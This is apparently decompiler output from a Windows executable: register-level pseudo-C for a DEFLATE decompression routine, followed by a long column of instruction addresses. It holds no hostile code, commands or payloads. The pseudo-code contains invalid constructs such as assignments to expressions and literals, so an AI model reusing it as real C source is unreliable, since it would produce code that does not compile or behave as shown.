											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x432610
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x432e10
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                                  0x00406d85
                                                                                  0x00406d85
                                                                                  0x00406d85
                                                                                  0x00406d85
                                                                                  0x00406d85
                                                                                  0x00406d89
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d8f
                                                                                  0x00406d8f
                                                                                  0x00406d92
                                                                                  0x00406d95
                                                                                  0x00406d9a
                                                                                  0x00406d9c
                                                                                  0x00406d9f
                                                                                  0x00406da2
                                                                                  0x00406da5
                                                                                  0x00406da5
                                                                                  0x00406da8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406daa
                                                                                  0x00406daa
                                                                                  0x00406dad
                                                                                  0x00406db2
                                                                                  0x00406db4
                                                                                  0x00406db7
                                                                                  0x00406dbd
                                                                                  0x00406b1c
                                                                                  0x00406b1c
                                                                                  0x00406b1f
                                                                                  0x00406b25
                                                                                  0x00406b2b
                                                                                  0x00406b34
                                                                                  0x00406b3a
                                                                                  0x00406b3d
                                                                                  0x00406b44
                                                                                  0x00406b49
                                                                                  0x00406b4f
                                                                                  0x00406b5a
                                                                                  0x00406b5a
                                                                                  0x00406dc3
                                                                                  0x00406dc3
                                                                                  0x00406dcd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406dd3
                                                                                  0x00406dd3
                                                                                  0x00406dd7
                                                                                  0x00406dda
                                                                                  0x00406dda
                                                                                  0x00406dde
                                                                                  0x00406de4
                                                                                  0x00406de4
                                                                                  0x00406de7
                                                                                  0x00406dea
                                                                                  0x00406df0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406df2
                                                                                  0x00406e14
                                                                                  0x00406e14
                                                                                  0x00406e17
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406df4
                                                                                  0x00406df8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406dfe
                                                                                  0x00406dfe
                                                                                  0x00406e01
                                                                                  0x00406e04
                                                                                  0x00406e09
                                                                                  0x00406e0b
                                                                                  0x00406e0e
                                                                                  0x00406e11
                                                                                  0x00406e11
                                                                                  0x00406e19
                                                                                  0x00406e19
                                                                                  0x00406e1f
                                                                                  0x00406e22
                                                                                  0x00406e25
                                                                                  0x00406e25
                                                                                  0x00406e2c
                                                                                  0x00406e30
                                                                                  0x00406e34
                                                                                  0x00406e37
                                                                                  0x00406e3a
                                                                                  0x00406e40
                                                                                  0x00406e45
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e47
                                                                                  0x00406e5b
                                                                                  0x00406e5b
                                                                                  0x00406e5f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e49
                                                                                  0x00406e4c
                                                                                  0x00406e4c
                                                                                  0x00406e53
                                                                                  0x00406e58
                                                                                  0x00406e58
                                                                                  0x00406e58
                                                                                  0x00406e61
                                                                                  0x00406e61
                                                                                  0x00406e64
                                                                                  0x00406e72
                                                                                  0x00406e78
                                                                                  0x00406e7d
                                                                                  0x00406e83
                                                                                  0x00406e89
                                                                                  0x00406e8f
                                                                                  0x00406e96
                                                                                  0x00406eaa
                                                                                  0x00406eaa
                                                                                  0x00407479
                                                                                  0x00407479
                                                                                  0x00407479
                                                                                  0x0040747e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ab6
                                                                                  0x00406ab6
                                                                                  0x00000000
                                                                                  0x004070b1
                                                                                  0x004070b1
                                                                                  0x004070b5
                                                                                  0x004070b8
                                                                                  0x004070bb
                                                                                  0x004070be
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070c4
                                                                                  0x004070c4
                                                                                  0x004070e9
                                                                                  0x004070e9
                                                                                  0x004070e9
                                                                                  0x004070eb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070c9
                                                                                  0x004070c9
                                                                                  0x004070cd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070d3
                                                                                  0x004070d3
                                                                                  0x004070d6
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070de
                                                                                  0x004070e0
                                                                                  0x004070e3
                                                                                  0x004070e6
                                                                                  0x004070e6
                                                                                  0x004070e6
                                                                                  0x004070ed
                                                                                  0x004070ed
                                                                                  0x004070f5
                                                                                  0x004070f8
                                                                                  0x004070fb
                                                                                  0x004070fe
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407107
                                                                                  0x0040710a
                                                                                  0x0040710c
                                                                                  0x00407120
                                                                                  0x00407120
                                                                                  0x00407123
                                                                                  0x0040713d
                                                                                  0x0040713d
                                                                                  0x00407140
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407146
                                                                                  0x00407146
                                                                                  0x00407149
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040714f
                                                                                  0x0040714f
                                                                                  0x00000000
                                                                                  0x0040714f
                                                                                  0x00407125
                                                                                  0x00407128
                                                                                  0x0040712f
                                                                                  0x00407132
                                                                                  0x00000000
                                                                                  0x00407132
                                                                                  0x0040710e
                                                                                  0x00407112
                                                                                  0x00407115
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040715a
                                                                                  0x0040715a
                                                                                  0x0040717f
                                                                                  0x0040717f
                                                                                  0x0040717f
                                                                                  0x00407181
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040715f
                                                                                  0x0040715f
                                                                                  0x00407163
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407169
                                                                                  0x00407169
                                                                                  0x0040716c
                                                                                  0x0040716f
                                                                                  0x00407172
                                                                                  0x00407174
                                                                                  0x00407176
                                                                                  0x00407179
                                                                                  0x0040717c
                                                                                  0x0040717c
                                                                                  0x0040717c
                                                                                  0x00407183
                                                                                  0x0040718b
                                                                                  0x0040718e
                                                                                  0x00407191
                                                                                  0x00407193
                                                                                  0x00407196
                                                                                  0x00407196
                                                                                  0x00407198
                                                                                  0x0040719c
                                                                                  0x0040719f
                                                                                  0x004071a2
                                                                                  0x004071a5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004071ab
                                                                                  0x004071ab
                                                                                  0x004071d0
                                                                                  0x004071d0
                                                                                  0x004071d0
                                                                                  0x004071d2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004071b0
                                                                                  0x004071b0
                                                                                  0x004071b4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004071ba
                                                                                  0x004071ba
                                                                                  0x004071bd
                                                                                  0x004071c0
                                                                                  0x004071c3
                                                                                  0x004071c5
                                                                                  0x004071c7
                                                                                  0x004071ca
                                                                                  0x004071cd
                                                                                  0x004071cd
                                                                                  0x004071cd
                                                                                  0x004071d4
                                                                                  0x004071d4
                                                                                  0x004071dc
                                                                                  0x004071df
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x004071e9
                                                                                  0x004071ec
                                                                                  0x004071ee
                                                                                  0x004071f1
                                                                                  0x004071f4
                                                                                  0x0040720e
                                                                                  0x0040720e
                                                                                  0x00407211
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407217
                                                                                  0x00407217
                                                                                  0x0040721a
                                                                                  0x00407221
                                                                                  0x00000000
                                                                                  0x00407221
                                                                                  0x004071f6
                                                                                  0x004071f9
                                                                                  0x00407200
                                                                                  0x00407203
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407229
                                                                                  0x00407229
                                                                                  0x0040724e
                                                                                  0x0040724e
                                                                                  0x0040724e
                                                                                  0x00407250
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407238
                                                                                  0x00407238
                                                                                  0x0040723b
                                                                                  0x0040723e
                                                                                  0x00407241
                                                                                  0x00407243
                                                                                  0x00407245
                                                                                  0x00407248
                                                                                  0x0040724b
                                                                                  0x0040724b
                                                                                  0x0040724b
                                                                                  0x00407252
                                                                                  0x0040725a
                                                                                  0x0040725d
                                                                                  0x00407260
                                                                                  0x00407262
                                                                                  0x00407265
                                                                                  0x00407265
                                                                                  0x00407267
